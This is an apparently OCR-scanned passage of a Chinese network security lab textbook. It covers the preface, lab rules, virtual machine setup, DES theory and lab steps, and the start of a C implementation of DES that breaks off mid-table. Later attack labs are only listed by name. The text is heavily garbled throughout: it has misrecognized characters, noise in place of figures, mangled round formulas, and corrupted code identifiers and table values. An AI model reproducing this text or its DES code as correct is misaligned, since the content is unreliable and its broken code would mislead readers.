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随 着 计算 机 、 通 信 技 术 的 飞速 发 展 ,网 络 已 经 广泛 而 又 深刻 地 影响 着 人 们 
的 日 常生 活 。 与 此 同时 ,网 络 安全 问题 也 成 为 当今 社会 的 一 个 普遍 存在 的 问 
题 。 近 几 年 ,大 数据 ` 云 计算 等 新 兴 技术 的 出 现 , 更 是 让 我 们 意识 到 强调 安全 问 
题 的 必要 性 和 重要 性 。 

目前 工科 院 校 计 算 机 大 多 设置 密码 学 、 信 息 安全 、 网 络 安全 等 相关 专业 , 因 
为 安全 问题 是 计算 机 和 互联 网 的 重 中 之 重 。“ 网 络 安全 与 管理 ?是 多 所 高 校 计 
算 机 和 信息 安全 类 本 科 生 的 专业 基础 类 必修 课 ,是 学 生 接触 网 络 安全 和 网 络 管 
理 的 理论 和 实践 知识 的 起 点 。 在 安全 问题 日 渐 突 出 和 成 熟 的 情况 下 ,实验 动手 
能 力 显得 尤为 重要 ,实验 课程 是 学 生 对 理论 知识 消化 理解 .应 用 于 实践 的 有 效 
途径 。 本 书 针对 网 络 安全 和 管理 方面 的 技术 ,涉及 知识 点 全 面 ,实验 内 容 具 有 
代表 性 , 且 本 书 深入 浅 出 的 讲解 方式 ,对 于 学 生来 说 易 上 手 、 易 操作 。 

本 书 是 结合 北京 科技 大 学 信息 安全 类 专业 及 相关 专业 课程 而 设计 编制 的 ， 
书 中 所 选用 的 部 分 实验 内 容 是 依据 吉林 中 软 吉大 信息 技术 有 限 公司 开发 的 网 
络 信息 安全 综合 实验 系统 中 所 提供 的 部 分 实验 内 容 。 全 书 共 分 为 18 章 , 涵 盖 
了 网 络 安全 领域 的 基本 实用 技术 ,从 而 满足 读者 的 实际 学 习 和 工作 需要 。 第 1 
和 第 2 章 是 对 网 络 安全 与 管理 实验 的 概述 ,介绍 了 网 络 安全 与 管理 的 实验 目 
的 、 要 求 、 步 又 和 实验 环境 搭建 等 问题 。 第 3 和 第 4 章 介 绍 网 络 安全 中 应 用 到 
的 两 种 加 密 算法 一 一 DES 算法 和 RSA 算法 。 第 5 一 第 18 章 ,分别 介绍 了 公 钥 
基础 设施 PKI 的 应 用 、 主 动 水 印 攻击 .DDoS Bei ARP 欺骗 攻击 、TCP 端口 扫 
描 、 模 拟 攻 击 方法 、Winpcap 嗅 探 器 、 利 用 跳 转 指令 实现 缓冲 区 溢出 、 基 于 网 络 
的 入 侵 检测 系统 、 自 制 蜜 镀 、 利 用 OpenVPN 构建 企业 VPN, iptables 的 应 用 、 
计算 机 木马 攻击 和 反 病 毒 软件 。 这 些 实验 内 容 由 背景 知识 人 手 , 分 步骤 、 分 角 
色 且 图 文 并 茂 地 讲解 ,并 在 实验 最 后 设置 了 思考 问题 。 

编者 对 于 本 书 的 编写 主要 侧重 于 以 下 几 点 : 首先 ,对 于 实验 内 容 从 教材 整 
体 上 体现 系统 、 完 善 .循序 渐进 .层次 化 结构 ;注重 实验 项 目的 深度 和 广度 的 把 
握 , 使 实验 对 于 学 生 有 可 发 挥 的 余地 和 可 扩展 的 空间 ;其 次 ,以 综合 实验 为 主 ， 
不 乏 理 论 知识 的 引导 和 梳理 。 让 “网 络 安全 与 管理 ”等 这 类 实验 课 成 为 高 校 安 


全 类 专业 本 科 生 进行 动手 实践 训练 和 创新 能 力 培养 的 起 点 ,为 后 续 课 外 科技 创 
新 活动 .认识 和 生产 实习 .电子 设计 竞赛 .毕业 设计 等 打下 基础 ,实现 实践 创新 
的 一 体 化 培养 。 

本 教材 的 编写 得 到 了 "十 二 五 ?期 间 北京 科技 大 学 教材 建设 经 费 的 资助 。 
同时 本 书 受 北京 市 科技 计划 项 目 (No. D141100003414002) ,北京 市 自然 科学 基 
金 (No. 4142034) ,北京 市 青年 英才 计划 (No. YETP0380) 及 中 央 高 校 基 本 科研 
业务 项 目 (No. FRF-TP-14-042A2) 的 资助 。 

在 本 书 编写 过 程 中 ,得 到 了 北京 科技 大 学 计算 机 与 通信 工程 学 院 副 院 长 王 
建 萍 教授 ,软件 工程 系 朱 岩 教授 、 张 冬 艳 副教授 和 其 他 所 有 同事 的 大 力 支持 和 
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lime 网 络 安全 与 管理 实验 概述 
1.1 实验 的 目的 与 要 求 


目前 ,许多 工科 高 等 院 校 计算 机 学 院 设置 了 信息 安全 相关 专业 ,因为 安全 问题 是 计算 机 
和 互联 网 稳步 发 展 的 一 个 必要 条 件 和 重 中 之 重 。 本 教材 是 根据 高 等 院 校 网 络 安 全 信息 安 
全 及 密码 学 等 专业 的 专业 课程 “网 络 安全 与 管理 ”编写 的 配套 实验 教材 。“ 网 络 安全 与 管理 
实验 教程 ?是 计算 机 和 信息 安全 类 本 科 生 巩固 网 络 安全 和 网 络 管理 理论 知识 的 起 点 ,是 打下 
良好 实践 动手 能 力 的 起 点 。 

编写 本 书 的 目的 是 通过 学 生 亲 自动 手 参与 实验 过 程 , 能 够 巩固 加 深 对 于 该 课程 理论 知 
识 的 理解 。 在 这 个 过 程 中 以 解决 和 分 析 具 体 网 络 安全 问题 为 目的 ,按照 由 浅 入 深 的 思路 ,以 
任务 驱动 的 方式 ,使 学 生 掌 握 网 络 安全 工具 和 网 络 管理 工具 的 使 用 ,并 能 对 Windows 平台 
和 Linux 平 台 的 安全 管理 问题 进行 初步 的 分 析 和 人 解决, 全面 掌握 网 络 安全 领域 的 实用 技术 ， 
达到 理论 结合 实践 的 最 终 目 的 。 


1.2 实验 课 学 习 步 又 


本 教程 中 的 实验 要 求学 生 进 行 每 一 个 实验 之 前 首先 完成 相关 部 分 理论 知识 的 学 习 , 或 
者 具有 相关 理论 知识 的 基础 。 同 学 们 在 实验 课程 开始 前 需要 对 实验 内 容 进行 预习 ,了 解 实 
验 原理 .实验 环境 .实验 任务 ,做 好 知识 技能 储备 。 每 一 章节 的 开始 会 对 实验 的 背景 知识 做 
一 个 具体 的 介绍 ,同学 们 在 动手 实验 之 前 应 先 掌握 这 些 背 景 知识 ,也 可 以 通过 图 书馆 或 网 上 
查找 资料 进行 扩充 和 细 化 。 


1.3 实验 报告 要 求 


在 实验 过 程 中 ,严格 遵守 实验 室 规 章 和 安全 操作 流程 ,对 于 单 人 任务 ,能 够 独立 完成 ;对 
于 多 人 任务 能 够 良好 地 分 工 协作 ,完成 任务 ,整个 实验 过 程 需 要 对 重要 图 表 数 据 截图 保存 ， 
完成 实验 报告 。 对 于 实验 中 遇 到 的 问题 能 够 通过 讨论 ,查找 资料 或 者 请 教 老 师 得 到 解决 , 课 
后 完成 实验 教程 中 的 思考 问题 。 

实验 报告 中 应 具备 以 下 内 容 : 

(1) 封面 ,应 包括 课程 名 称 ,学 生 的 班级 、 姓 名 、 学 号 、 指 导 教 师 。 

(2) WIR ,实验 环 境 、 组 内 分 工 \ 实 验 步 骤 说 明和 截图 。 

(3) 实验 小 结 和 思考 题 ,对 实验 的 总 结 和 体会 ,收获 和 疑惑 ;对 课 后 思考 题 的 思考 过 程 
和 给 出 的 解决 办 法 。 
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1.4 实验 室 规则 和 安全 操作 流程 


(1) 学 生 应 有 秩序 地 进入 实验 室 ,严禁 大 声 喧哗 、 跑 动 , 以 保证 安静 良好 的 学 习 环 境 。 

(2) 为 了 保证 计算 机 及 其 他 设备 的 安全 和 卫生 ,学 生 不 得 将 食品 饮料 等 零食 带 入 实 
RE. 
(3) 做 实验 前 先 检 查 设 备 完好 情况 , 若 发 现 设 备 故障 ,应 及 时 向 教师 报告 情况 。 教 师 应 
详细 记录 设备 故障 情况 ,妥善 进行 处 理 。 

(4) 正确 开关 机 。 在 操作 过 程 中 不 得 随便 或 频繁 开关 机 。 如 遇 死 机 可 采用 热 启 动 或 系 
统 复位 方式 重新 启动 系统 。 迫 不 得 已 关机 后 , 需 至 少 半分 钟 后 才 可 开机 。 

(5) 在 操作 过 程 中 ,严禁 随便 拔 插 各 类 插头 :严禁 用 力 击 打 键盘 ;严禁 在 驱动 器 红 灯 亮 
时 进行 插 、 取 盘 操 作 ; 学 生 上 机 应 使 用 学 校 提供 统一 管理 的 软盘 ,严禁 私自 携带 各 种 磁盘 进 
和 人 实验 室 并 上 机 操作 ,以 防 病毒 侵入 。 对 违反 操作 规程 引起 的 设备 损坏 ,要 按 原价 赔偿 。 

(6) 操作 完成 后 应 正常 退出 所 使 用 的 软件 ,正确 关闭 计算 机 。 将 耳机 、 键 盘 、 鼠 标 、 椅 子 
放 好 ,认真 填写 设备 记录 后 , 方 可 离开 。 

(7) 特别 严禁 以 下 行为 ,对 有 违反 者 轻 则 做 书面 检查 ,屡教不改 者 学 校 将 严肃 处 理 : 

D 对 计算 机 进行 加 密 。 

© 将 实验 室内 的 软盘 带 出 。 

@ 私自 携带 软盘 进入 实验 室 。 

@ 擅自 修改 ,删除 系统 文件 。 

@ 损毁 实验 室 设 备 。 

(8) 除 教学 人 员 用 机 、 学 生 上 机 、 计 算 机 活动 课 . 计 算 机 兴趣 小 组 用 机 外 , 非 经 主管 人 员 
许可 ,外 人 不 得 进入 实验 室 , 不 得 擅自 用 机 , 违 者 后 果 自 负 。 

(9) 不 得 让 任何 无 关 的 人 员 使 用 自己 的 计算 机 ,不 要 擅自 或 让 其 他 非 专业 技术 人 员 修 
改 自 己 计算 机 系统 的 重要 设置 。 

C10) 做 实验 期 间 禁 止 上 网 浏览 任何 与 工作 无 关 的 信息 。 

(11) 严禁 利用 计算 机 系统 上 网 发 布 .浏览 下 载 .传送 反动 、 色 情 及 暴力 的 信息 。 

(12) 严格 遵守 (中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联网 管理 暂行 规定 》, 严 禁 利用 计 
算 机 非法 入 侵 他 人 或 其 他 组 织 的 计算 机 信息 系统 。 
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2.1 概述 


随 着 现代 通信 技术 的 迅速 发 展 和 普及 ,因特网 进入 千家 万 户 , 计 算 机 的 应 用 也 日 益 广泛 
和 深入 。 同 时 , 随 着 云 计算 、 大 数据 等 新 兴 技 术 的 发 展 ,信息 安全 和 网 络 安全 问题 也 日 益 突 
出 ,情况 越 来 越 复杂 。 实 验 教程 针对 信息 安全 和 网 络 安全 问题 ,由 浅 人 深 地 给 读者 一 个 动手 
实践 的 方法 和 理解 实际 问题 的 途径 。 

本 实验 教程 中 部 分 实验 是 基于 中 软 吉 大 网 络 信息 安全 教学 实验 系统 进行 的 ,中 软 吉 
的 网 络 信息 安全 教学 实验 系统 是 一 套 内 容 涵 盖 全 面 .知识 层次 递 进 的 实验 教学 平台 ,适合 高 
校 信息 安全 专业 的 同学 进行 课堂 实验 和 攻防 训练 。 对 于 没有 部 署 该 套 系统 的 读者 , 书 中 提 
供 了 相应 的 替代 实验 任务 进行 相同 实验 目的 的 练习 ,教师 和 同学 们 可 以 根据 自身 实验 室 环 
境 进 行 灵活 选择 。 


2.2 网 络 结构 的 选择 与 搭建 


本 教程 中 的 部 分 实验 需要 两 个 人 或 多 个 人 协作 完成 ,在 每 个 实验 的 实验 环境 中 都 会 介 
绍 本 实验 需要 的 人 数 和 网 络 拓扑 结构 ,为 了 统一 起 见 ,将 主机 间 的 位 置 关系 归纳 为 交换 网 络 
结构 和 企业 网 络 结构 两 种 网 络 拓扑 结构 。 这 两 种 网 络 拓扑 结构 是 根据 实验 的 攻防 角色 的 实 
际 情况 确定 的 ,实验 过 程 中 教师 可 以 根据 自己 班级 的 人 数 情况 ,或 者 同学 根据 自己 的 实际 需 
求 进行 拓扑 连接 ,也 可 以 自己 设计 网 络 拓扑 图 ,构建 不 同 的 主机 的 位 置 关 系 。 

在 交换 网 络 结构 中 ,实验 组 间 主 机 可 相互 通信 ,实验 组 内 各 共享 模块 间 可 相互 通信 ,并 
且 实 验 主 机 可 以 访问 应 用 服务 器 提供 的 各 种 服务 和 资源 ,如 图 2.1 所 示 。 


应 用 服务 器 


图 2.1 交换 网 络 结构 拓扑 图 
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在 企业 网 络 结构 中 ,实验 组 间 相 互 独立 ,实验 组 内 各 共享 模块 间 不 能 直接 通信 。 通 过 对 
防火 墙 进行 配置 ,可 实现 对 实验 组 内 主机 进行 区 域 划分 : 主机 A、B 为 企业 内 网 主机 , 主机 
C.D 为 企业 DMZ( 非 军事 区 ) 主 机 ,主机 E 为 外 网 主机 。 主 机 间 的 具体 连接 情况 如 图 2.2 
所 示 。 


图 2.2 企业 网 络 结构 拓扑 图 


2.3 虚拟 机 的 选择 与 使 用 


本 实验 教程 中 实验 环境 涉及 多 台 主 机 安装 多 种 操作 系统 ,因此 大 量 使 用 了 虚拟 机 
软件 来 模拟 需要 的 主机 和 系统 ,学 生 在 脱离 实验 室 环境 的 情况 下 也 可 以 自行 安装 虚拟 机 进 
行 一 些 简单 实验 的 练习 。 
虚拟 机 软件 可 以 在 计算 机 平台 和 终端 用 户 之 间 建 立 一 种 环境 ,而 终端 用 户 则 是 基于 这 
个 软件 所 建立 的 环境 来 操作 软件 的 。 在 计算 机 科学 中 ,虚拟 机 是 指 可 以 像 真实 机 器 一 样 运 
行程 序 的 计算 机 的 软件 实现 。 目 前 常用 的 虚拟 机 软件 有 以 下 几 种 。 


2.3.1 VirtualBox 


VirtualBox 最 早 是 德国 一 家 软件 公司 InnoTek 所 开发 的 虚拟 系统 软件 ,后 来 被 Sun 7 
司 收购 ,改名 为 Sun VirtualBox, 性 能 有 很 大 的 提高 。 因 为 它 是 开源 的 ,不 同 于 VM, 而 且 功 
能 强大 ,可 以 在 Linux, Mac 和 Windows 主机 中 运行 ,并 支持 在 其 中 安装 Windows(NT 4. 0、 
2000 、XP、Server 2003, Vista) ,DOS/ Windows 3. x、Linux(2.4 和 2.6)、OpenBSD 等 系列 的 
客户 操作 系统 。 假 如 你 有 用 过 虚拟 机 软件 经 历 的 话 , 相 信使 用 VirtualBox 不 在 话 下 。 即 便 
你 是 第 一 次 使 用 也 没有 关系 ,VirtualBox 提供 了 详细 的 文档 ,可 以 帮助 你 在 短期 内 入 门 。 


2.3.2 VMWare Workstation 


VMWare( 中 文 名 “ 威 寄 ”, 纽 约 证 券 交 易 所 代码 为 VYMW) 虚拟 机 软件 ,是 全 球 桌 面 到 
数据 中 心虚 拟 化 解决 方案 的 领导 厂商 。VMWare 不 需要 重 开机 就 能 在 同一 台 计 算 机 上 使 
用 好 几 个 操作 系统 。VMWare 的 主要 功能 如 下 : 

(1) 不 需要 分 区 或 重 开机 就 能 在 同一 台 PC 上 使 用 两 种 以 上 的 操作 系统 。 

(2) 完全 隔离 并 且 保护 不 同 操作 系统 的 操作 环境 以 及 所 有 安装 在 操作 系统 上 面 的 应 用 
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软件 和 资料 。 
(3) 不 同 的 操作 系统 之 间 还 能 互动 操作 ,包括 网 络 .周边 文件 分 享 及 复制 粘贴 功能 。 
(4) 有 复原 (Undo) 功 能 。 
(5) 能 够 设 定 并 且 随 时 修改 操作 系统 的 操作 环境 ,如 内 存 、 磁 碟 空 间 、 周 边 设 备 等 。 


2.3.3 Virtual PC 


它 能 够 让 你 在 一 台 PC 上 同时 运行 多 个 操作 系统 ,使 用 它 不 用 重新 启动 系统 ,只 要 单 击 
便 可 以 打开 新 的 操作 系统 或 是 在 操作 系统 之 间 进 行 切换 。 安 装 该 软件 后 不 用 对 硬盘 进行 重 
新 分 区 或 是 识别 ,就 能 够 非常 顺利 地 运行 已 经 安装 的 多 个 操作 系统 ,而 且 还 能 使 用 拖 放 功 能 
在 几 个 虚拟 PC 之 间 共 享 文件 和 应 用 程序 。 


2.3.4 本 书 实验 的 虚拟 机 


以 上 介绍 的 这 些 虚拟 机 软件 都 有 各 自 的 优 、 缺 点 ,在 实际 应 用 过 程 中 可 以 灵活 选择 , 具 
体 的 虚拟 机 软件 的 安装 和 使 用 可 以 参考 官方 文档 进行 学 习 。 在 以 后 的 章节 中 使 用 到 的 虚拟 
机 ,为 了 统一 起 见 , 都 是 采用 VMWare 虚拟 机 ,大 家 也 可 以 根据 自己 的 实验 需求 选择 其 他 虚 
拟 机 。 


2.4 系统 版 本 和 软件 版 本 


本 教程 是 基于 实验 室 现 有 环境 进行 编写 的 , Windows 环境 使 用 了 Windows 2003 系统 ， 
Linux 环境 使 用 了 VMWare 虚拟 机 软件 安装 Fedora 和 Redhat( 部 分 实验 使 用 Ubuntu) 系 
统 , 以 上 系统 仅 供 参 考 ,在 实际 实验 环境 准备 过 程 中 ,本 教程 并 不 局 限于 特定 系统 ,学 生 可 以 
自行 选择 相应 环境 的 系统 ,例如 , Windows 环境 可 以 选用 Windows XP、WindowsVista、 
Windows 7; Linux 环境 可 以 选择 其 他 发 行 版 ,如 CentOS, Ubuntu. 虚拟 机 软件 可 以 选择 
VirtualBox 等 ,只 要 保证 相应 的 系统 里 面包 含 实验 过 程 中 所 用 到 的 相应 实验 软件 即 可 。 具 
体 软 件 的 版 本 也 不 局 限于 某 一 个 指定 版 本 ,学 生 可 以 参考 软件 的 官方 文档 选择 合适 的 版 本 
进行 实验 。 
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3.1 实验 目的 与 要 求 


。 理解 对 称 加 密 算 法 的 原理 和 特点 。 
。 理解 DES 算法 的 加 密 原理 。 
。 编程 实现 DES 算法 。 


3.2 实验 环境 


在 VMWare 虚拟 机 中 安装 操作 系统 Windows 2003, 在 交换 网 络 结构 下 ,每 组 两 人 ,使 
用 VC++ 6.0 和 系统 自 带 密码 工具 。 


3.3 背景 知识 


3.3.1 对 称 加 密 算法 


对 称 加 密 算 法 又 叫 传统 密码 算法 ,就 是 加 密 密 钥 能 够 从 解密 密 钥 中 推导 出 来 ; 反 过 来 也 
成 立 。 在 大 多 数 对 称 算法 中 ,加 、 解 密 密 钥 是 相同 的 。 这 些 算法 也 叫 秘密 密 钥 算法 或 单 密 钥 
算法 , 它 要 求 发 送 者 和 接收 者 在 安全 通信 之 前 商定 一 个 密 钥 。 对 称 算法 的 安全 性 依赖 于 密 
4] ,泄露 密 钥 就 意味 着 任何 人 都 能 对 消息 进行 加 、 解 密 。 只 要 通信 需要 保密 , 密 钥 就 必须 保 
密 。 对 称 密码 体系 通常 分 为 两 大 类 : 一 类 是 分 组 密码 (如 DES, AES 算法 ); 另 一 类 是 序列 
密码 (如 RC4 算法 ) 。 

图 3. 1 描述 了 对 称 密 码 (传统 密码 ) 系 统 原 理 框架 ,其 中 M 表示 明文 ;C 表示 密 文 ;E KR 
示 加 密 算法 ;D 表示 解密 算法 ;K 表示 密 钥 ;T 表 示 密 码 分 析 员 进行 密码 分 析 时 掌握 的 相关 
信息 ;B 表示 密码 分 析 员 对 明文 M 的 分 析 和 猜测 。 


一 人 | 密码 分 析 者 | 2 


M z | [uz | M=D(C, K) 
- 发 送 方 = | 
明文 E SÉXC-E(M, K) RE 
P te 
K 


密 钥 空间 


图 3.1 对 称 加 密 系 统 原理 框架 


对 称 密码 体系 的 优点 如 下 。 
CD 加 密 效 率 高 ,硬件 实现 可 达 每 秒 数 百 兆 字 节 (软件 实现 略 慢 一 些 ) 。 
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(2) 密 钥 相对 比较 短 。 

(3) 可 以 用 来 构造 各 种 密码 机 制 。 

(4) 可 以 用 来 建造 安全 性 更 强 的 密码 。 

对 称 密码 体系 的 缺点 如 下 。 

(1) 通信 双方 都 要 保持 密 钥 的 秘密 性 。 

(2) 在 大 型 网 络 中 ,每 个 人 需 持 有 许多 密 钥 。 
O 为 了 安全 ,需要 经 常 更 换 密 钥 。 


3.3.2 DES 加 密 算法 


数据 加 密 标准 (Data Encryption Standard,DES) 是 美国 国家 标准 局 开始 研究 除 国防 部 
以 外 的 其 他 部 门 的 计算 机 系统 的 数据 加 密 标 准 。1972 年 和 1974 年 ,美国 国家 标准 局 
(NBS) 先 后 两 次 向 公众 发 出 了 征求 加 密 算法 的 公告 ,这 一 举措 最 终 导致 了 数据 加 密 标准 
DES 的 出 现 。DES 采用 分 组 乘积 密码 体制 , 它 是 由 IBM 开发 的 ,是 对 早期 Lucifer 密码 体 
制 的 改进 。DES 于 1975 年 3 月 17 日 首次 在 联邦 记录 中 公布 ,而 且 声 明 对 此 算法 征求 意见 。 
到 1977 年 2 月 15 日, 拟 议 中 的 DES 被 采纳 为 “ 非 密 级 ”应 用 的 一 个 联邦 标准 。 

最 初 预期 DES 作为 一 个 标准 只 能 使 用 10 一 15 年 ,在 其 被 采用 后 ,大 约 每 隔 5 年 被 评审 
一 次 。DES 的 最 后 一 次 评审 是 在 1999 年 1 H. 但是, 随 着 计算 机 计算 能 力 的 提高 ,由 于 
DES 的 密 钥 过 短 , 仅 有 56 位 ,对 DES 的 成 功 攻击 也 屡 见 报道 。 

NIST( 美 国 国家 标准 研究 所 ) 于 1997 年 发 布 公告 ,征集 新 的 数据 加 密 标准 作为 联邦 信 
息 处 理 标准 以 代替 DES。 新 的 数据 加 密 标准 称 为 AES。 尽 管 如 此 ,DES 的 出 现 对 于 分 析 掌 
握 分 组 密码 的 基本 理论 与 设计 原理 仍然 具有 重要 的 意义 。 


3.3.3 DES 加 密 流程 


对 于 任意 长 度 的 明文 ,DES 首先 对 其 进行 分 组 ,使 得 每 一 组 的 长 度 为 64 位 ,然后 分 别 
对 每 个 64 位 的 明文 分 组 进行 加 密 。 

对 于 每 个 64 位 长 度 的 明文 分 组 的 加 密 过 程 如 下 。 

(1) 初始 置换 。 输 入 分 组 按照 初始 置换 表 重 排 次 序 ,进行 初始 置换 。 

(2) 16 轮 循环 。DES 对 经 过 初始 置换 的 64 位 明文 进行 16 轮 类 似 的 子 加 密 过 程 。 每 
一 轮 的 子 加 密 过 程 要 经 过 DES AY f 函数 ,其 过 程 如 下 。 

CD 将 64 位 明文 在 中 间 分 开 , 划 分 为 两 部 分 ,每 部 分 32 位 , 左 半 部 分 记 为 L, 右 半 部 分 
记 为 RR, 以 下 的 操作 都 是 对 右 半 部 分 数据 进行 的 。 

@ 扩展 置换 。 扩 展 置 换 将 32 位 的 输入 数据 根据 扩展 置换 表 扩 展 成 为 48 位 的 输出 
数据 。 

@ 异 或 运算 。 将 48 位 的 明文 数据 与 48 位 的 子 密 钥 进行 异 或 运算 。 

由 S 盒 置换 。S 盒 置 换 是 非 线性 的 ,48 位 输入 数据 根据 S 盒 置 换 表 置换 成 为 32 位 输 
出 数据 。 

© 直接 置换 。S 盒 置换 后 的 32 位 输出 数据 根据 直接 置换 表 进 行 直接 置换 。 

© 经 过 直接 置换 的 32 位 输出 数据 与 本 轮 的 工 部 分 进行 异 或 操作 ,结果 作为 下 一 轮子 
加 密 过 程 的 RR 部分。 本 轮 的 RR 部 分 直接 作为 下 一 轮子 加 密 过 程 的 L 部 分 。 然 后 进入 下 一 
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轮子 加 密 过 程 ,直到 16 轮 全 部 完成 。 
(3) 终结 置换 。 按 照 终结 置换 表 进 行 终结 置换 ,64 位 输出 就 是 密 文 。 
在 每 一 轮 的 子 加 密 过 程 中 ,48 位 的 明文 数据 要 与 48 位 的 子 密 钥 进行 异 或 运算 , 子 密 钥 


的 产生 过 程 如 下 。 

CD 压缩 型 换 位 1 : 64 位 初始 密 钥 根据 压缩 型 换 位 1 置换 表 进 行 置换 ,输出 的 结果 为 
56 位 。 

(2) 将 经 过 压缩 型 换 位 1 的 56 位 密 钥 数据 在 中 间 分 开 , 每 部 分 28 位 , 左 半 部 分 记 为 C， 
右 半 部 分 记 为 D. 

(3) 16 轮 循环 。C 和 DD 要 经 过 16 轮 类 似 的 操作 产生 16 份子 密 钥 ,每 一 轮子 密 钥 的 产 
生 过 程 如 下 。 


CD 循环 左 移 。 根 据 循环 左 移 表 对 C 和 进行 循环 左 移 。 循 环 左 移 后 的 C 和 DD 部 分 作 
为 下 一 轮子 密 钥 的 输入 数据 ,直到 16 轮 全 部 完成 。 

@ 将 C 和 部 分 合并 为 56 位 的 数据 。 

@ 压缩 型 换 位 2 : 56 位 的 输入 数据 。 根 据 压 缩 型 换 位 2 表 输 出 48 位 的 子 密 钥 ,这 48 
位 的 子 密 钥 将 与 48 位 的 明文 数据 进行 异 或 操作 。 


3.4 实验 内 容 


学 习 DES 加 密 过 程 和 解密 过 程 ,设计 DES 加 密 工 具 , 利 用 DES 加 密 算法 对 文件 进行 
加 密 。 


3.5 实验 步骤 


3.5.1 DES 加 密 解 密 


(1) 本 机 进入 “密码 工具 ”一 加密 解密 ”一 “"DES 加 密 算法 ”的 明文 输入 区 输入 明文 : 
。 明 文 加 密 后 的 密 文 如 图 3. 2 所 示 。 


64 位 密 钥 : [12345678 m € | NW E ] 
明文 
[powerful = 
到 
ex 
id 
& 入 Ls &] 


图 3.2 明文 加 密 后 的 密 文 
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(2) 在 密 钥 窗口 输入 8(64 位 ) 个 字符 的 密 钥 &, 密 钥 二 。 单 击 “ 加 密 ” 按 钮 ， 
将 密 文 导出 到 DES 文件 夹 (D:\Work\Encryption\DES\) 中 ,通告 同 组 主机 获取 密 文 ,并 将 


密 钥 & 告诉 同 组 主机 。 导 出 的 密 文 如 图 3. 3 所 示 。 


2x 
PRED: [O ves > eme 


我 最 近 的 文档 


(à 


8 


文人 各 中， a zi 
FMD): [rec File. txt) 了 | 取消 


图 3.3 导出 的 密 文 


(3) 单 击 “ 导 入 ”按钮 ,从 同 组 主机 的 DES 共享 文件 夹 中 将 密 文 导入 ,然后 在 密 钥 窗口 
输入 被 同 组 主机 通告 的 密 钥 &, 单 击 " 解 密 ” 按 钮 进行 DES 解密 。 过 程 如 图 3.4 所 示 。 


ax 
HRADOV: [«g 网 上 邻居 > ee 国 - 


si 


我 的 文档 
sr 
和 

我 的 电脑 

a | 
g 
网 上 邻居 


xam ee 可 
文件 类 型 Ci [ree File. txt) = 取消 | 


图 3.4 同 组 导入 密 文 


CA) 将 破解 后 的 明文 与 同 组 主机 记录 的 明文 比较 。 密 文 解密 后 的 明文 如 图 3. 5 所 示 。 


3.5.2 DES 算法 


本 机 进入 “密码 工具 ”一 “加 密 解 密 ”>“DES 加 密 算法 ”对 话 框 ,打开 “演示 ”页 签 , 在 “64 
位 明文 ”文本 框 中 输入 8 个 字符 (8 * 8bit 二 64) ,在 “64 位 密 钥 ”文本 框 中 输入 8 个 字符 (8 * 
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safes: [12345678 加 
明文 


Gal 
* 
Bj 


[powerful 


图 3.5 密 文 解密 后 的 明文 


8bit—64), DES 加 密 演 示 如 图 3. 6 所 示 。 


三 DES 加 密 演示 
64 位 明文 rete 
powerful [12345618 m € 
三 加 密 过 程 


初始 置换 
终结 置换 


64 位 密 文 16 进 制 ) : | 


图 3.6 DES 加 密 演示 


单 击 “ 加 密 ” 按 钮 ,进行 加 密 。 

1. 初始 置换 

经 过 分 组 后 的 64 位 明文 分 组 将 按照 初始 置换 表 重 新 排列 次 序 ,进行 初始 置换 ,置换 方 
法 如 下 : 初始 置换 表 从 左 到 右 、. 从 上 到 下 读 取 ,如 第 一 行 第 一 列 为 58, 意 味 着 将 原 明文 分 组 
的 第 58 位 置换 到 第 1 位 ,初始 置换 表 的 下 一 个 数 为 50, 意 味 着 将 原 明 文 分 组 的 第 50 位 置 


换 到 第 2 位 ,依次 类 推 ,将 原 明文 分 组 的 64 位 全 部 置换 完成 。“ 初 始 置换 ?对话 框 如 图 3.7 
所 示 。 


2. 密 钥 生 成 演示 

生成 密 钥 如 图 3. 8 所 示 。 

3. 十 六 轮 加 密 变换 

经 过 初始 置换 的 64 位 明文 数据 在 中 间 分 成 两 部 分 ,每 部 分 32 位 , 左 半 部 分 和 右 半 部 分 
分 别 记 为 L。 和 R。。 然 后 ,L。 和 Ro 进入 第 一 轮子 加 密 过 程 。R。 经 过 一 系列 的 置换 得 到 32 
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DES MSE Sik IRE xl 


图 3.7 “初始 置换 "对 话 框 


DES 加 密 算 法 -- 密 钥 生 成 演示 


ie | 
ig i I 


cit oorr 0oi+l (erie 
RET 


图 3.8 “ 密 钥 生成 演示 ”对 话 框 
位 输出 ,再 与 Lo 进行 异 或 (XOR) 运算。 其 结果 成 为 下 一 轮 的 RR 则 成 为 下 一 轮 的 Li. 
如 此 连续 运作 16 轮 ,每 轮 迭 代 如 图 3.9 所 示 。 可 以 用 下 列 两 个 式 子 来 表示 其 运算 过 程 , 即 
somewa [T 


are 


图 3.9 16 轮 选 代 
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R= L,4 XOR Rs Ki) 
Li= Ra i=1,2,++,16 
4. 终结 置换 
终结 置换 与 初始 置换 相对 应 ,它们 都 不 影响 DES 的 安全 性 ,主要 目的 是 为 了 更 容易 地 
将 明文 和 密 文 数据 以 字 节 大 小 放 入 DES 的 f 算法 或 者 DES 芯片 中 。“ 终 结 置换 ”对话 框 如 
图 3.10 所 示 。 


DES 加 密 算 法 -终结 置换 xj 


Behar pe arta 


= 
二 


Eis ps par] 
了 
(33 [1 [41 [9 [49 [17 [57 [2s | 


sag: porre 


图 3. 10 “终结 置换 "对 话 框 


3.5.3 源码 应 用 


设计 DES 加 密 工 具 , 利 用 DES 加 密 算法 对 文件 进行 加 密 。 

启动 VC++ 6.0。 选 择 File Open Workspace 菜单 命令 ,加 载 工程 文件 C:\ExpNIS\ 
Encrypt-LabVProjectsN DES\ DES. dsw, 基 于 此 工程 进行 程序 设计 。 下 面 给 出 一 个 参考 
例 程 。 


Static void xor(bool * ina, const bool * inb, int len); 
static void leftrotate (bool * in, int len, int loop); 
static void f func (bool in[32],const bool ki [48]) ; 
static void s_func (bool out [32],const bool in[48]); 
static void bytetdbit (bool * out,const char * in, int bits); 
static void bittobyte(char * out, const bool * in, int bits); 
const static char ip table[64]- (58,50, 42, 34, 26, 18, 10, 2, 60, 52, 44, 36, 28, 20, 12, 4, 62, 54, 46, 38, 30, 22, 14, 6, 64, 
56, 48, 40, 32, 24, 16, 8, 57, 49, 41, 33, 25, 17, 9, 1, 59, 51, 43, 35, 27, 19, 11, 3, 61, 53, 45, 37, 29, 21, 13, 5, 63, 55, 47, 39, 31, 23, 
15,7}; 
const static char ipr table[64]= {40,8,48,16,56,24, 64, 32, 39, 7, 47, 15, 55, 23, 63, 31, 38, 6, 46, 14, 54, 22, €2, 30, 37, 
